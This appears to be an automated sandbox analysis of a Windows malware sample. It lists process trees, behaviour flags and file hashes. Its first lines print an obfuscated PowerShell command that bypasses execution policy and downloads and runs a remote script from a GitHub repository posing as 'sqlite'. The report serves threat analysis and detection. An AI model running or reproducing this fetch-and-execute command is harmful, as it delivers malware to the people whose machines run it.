C:\Windows\system32\cmd.execmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA2⤵PID:3828
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA3⤵
- Blocklisted process makes network request
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:988
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
MD5
f8dc03fd43f31a7079f8adc43f9b7885
SHA1db2aff52da8f3c6c4482a06739913f053cd9b524
SHA25624c69a1ed5907f65c432804ac7b4ac8c1a619599745fb1dbd23c7ff4f5fe5150
SHA512154dc47cce4b63b39995e2996c8c912c4db4b52ad6a680c40d3f09fe71de14b4fa74507af6ed7caeaa14c520ce40791aedbd163d9ab5ddc93035bcfab25ef929
-
MD5
b71e0d39952eea911417462c408333df
SHA171fdbcf26e9d7b62be0e51b50b0fe117bf0d7bc8
SHA256871f2e8a16d60f98f217bb859e7c907646326cc09fc20567c16b51e94162aa1b
SHA512e0e12e59e8e05944c52be6c1e93f5d2d202ed25a320d34c3429d3b8497b6c5b667d736c8c28e57a5e651d84d22222b74e5e9d178de29f35ba97b221d13c2adba
-
MD5
3447df88de7128bdc34942334b2fab98
SHA1519be4e532fc53a7b8fe2ae21c9b7e35f923d3bb
SHA2569520067abc34ce8a4b7931256e4ca15f889ef61750ca8042f60f826cb6cb2ac9
SHA5122ccf6c187c3e17918daadd1fc7ca6e7dfaf6b958468a9867cca233e3506906164dfeb6104c8324e09d3058b090eab22417695b001ddb84f3d98562aec05eb78f
-
MD5
43473f4e719958639a9d89e5d8388999
SHA1ccb79eb606a23daa4b3ff8f996a2fbf281f31491
SHA256ce84b142a2983e1f60b3051cbff38153424a016178ce3fcf703e3694eb474734
SHA5121051092c5eae13758e8e01086907effc5c603cc1f9456fb2cdb951cb4b196c5c3d089ffd2e981b5d6731b0e6b24402fb2808a20f66ac6dcb1704a8f4b457b1fa
-
MD5
683d395d106abee61c7098e40b8fc7e4
SHA107cb7adcafee58e4b07495ac5eb1ebfc9de4f80a
SHA2566513a1970e9336c05b54a33b901594862cfbbbb194857a4b5152842583ef627b
SHA51229d4173c6f0c9a9b4a98097d2e96cecd9297d32dca4bbe9bc432995a061bfbfba468ddd0dd5aa59dad1eeec072ac7ba2b8afe80cf9cb9676d54045cff78978ee
-
MD5
4864fc038c0b4d61f508d402317c6e9a
SHA172171db3eea76ecff3f7f173b0de0d277b0fede7
SHA2560f5273b8fce9bfd95677be80b808119c048086f8e17b2e9f9964ae8971bd5a84
SHA5129e59e8bee83e783f8054a3ba90910415edacfa63cc19e5ded9d4f21f7c3005ca48c63d85ce8523a5f7d176aa5f8abafc28f824c10dbfb254eed1ce6e5f55bf31
-
MD5
f20359d17133c39dbcd112a6acee6648
SHA1958d96b491f1b8bea7b486df1e0e6cb0fda41805
SHA25666345544e54da490b5b38c3e3b60118cca1916512de530161297f3555cfee0ab
SHA51273f2e321c8c7cfb21e65f954c79f3bca1efc76a17c1e1b541b03f623e4eea8193e50dca5c8323ecd44f843bb139e9ae2e4ca075e00c4fb40433b3f9916afebab
-
MD5
271eacd9c9ec8531912e043bc9c58a31
SHA1c86e20c2a10fd5c5bae4910a73fd62008d41233b
SHA256177d6aab26c15ecf87f29f92ad0eaff355d195de1c0ef17d9cb9b7483c288934
SHA51287375d3e0c2505ff8d5860db4a9a2cbb88da73f492f2be937b1dfd1afa37133061b7c69121727728835eaf545ce1850ec4889bad33366b8d4dadd7838af791c0
-
MD5
1fa9c1e185a51b6ed443dd782b880b0d
SHA150145abf336a196183882ef960d285bd77dd3490
SHA256f25560518e8bebbc0abdde4c0241833e432ad4c56f934bb18067c1abf7305959
SHA51216bd50a904fa062f8ec6e41f00000da5d0221164c3eda90bc1791e195b25ef74bb9e1264d7536c204f9a01ca1489ae43484ceb1e7bb4f650aacf90fa16f1c9fc